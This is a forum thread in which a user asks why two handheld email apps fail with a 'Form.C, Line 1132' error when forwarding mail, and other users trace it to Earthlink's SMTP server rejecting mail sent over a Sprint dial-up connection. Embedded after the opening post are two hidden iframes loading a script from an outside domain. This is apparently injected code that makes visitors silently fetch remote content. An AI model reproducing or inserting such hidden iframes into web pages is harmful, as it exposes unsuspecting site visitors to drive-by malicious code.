+ Reply to Thread

Email - Forwarding Problem

I've tried 2 email apps so far (MsgAgent and AceMail) and both of them give me an error when attempting to forward any piece of mail to someone else. I looks like I can receive messages fine, but I apparently can't send new ones out. The error message I get in both apps is "Form.C, Line 1132, Object Not in Form". Is anyone else getting these, and does anyone know of a resolution?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Sounds like an application problem. I use Eudora mail and it works great! Do you have an SMTP server to send mail to? This top has been discussed ad nauseam in other threads.
    Carl

I use Earthlink as my ISP and I believe the server for POP3 and SMTP is the same: mail.earthlink.net. At least that's what I've been trying.

Administrator

Arrow

do you do a "check then send" first? the server need to ID who you are before you go and use it....

I don't specify this specifically (e.g., in MsgAgent I don't even see where that option can be made), but it always checks for new inbox messages first before attempting to send new ones, so that doesn't appear to be my problem.

AFIK, you can not send mail using Earthlink's SMTP server unless you dial their network. Are you dialing Sprint's network or Earthlink. If you dial directly to Earthlink's network, it should work fine for you. Earthlink uses reverse DNS to determine if you can send mail via their SMTP servers.
    Carl

I'm sure that's the problem if what you're saying is correct, since I am dialing Sprint and not Earthlink's network. Is there any difference in using the browser on Earthlink's network vs. Sprint's that you're aware of?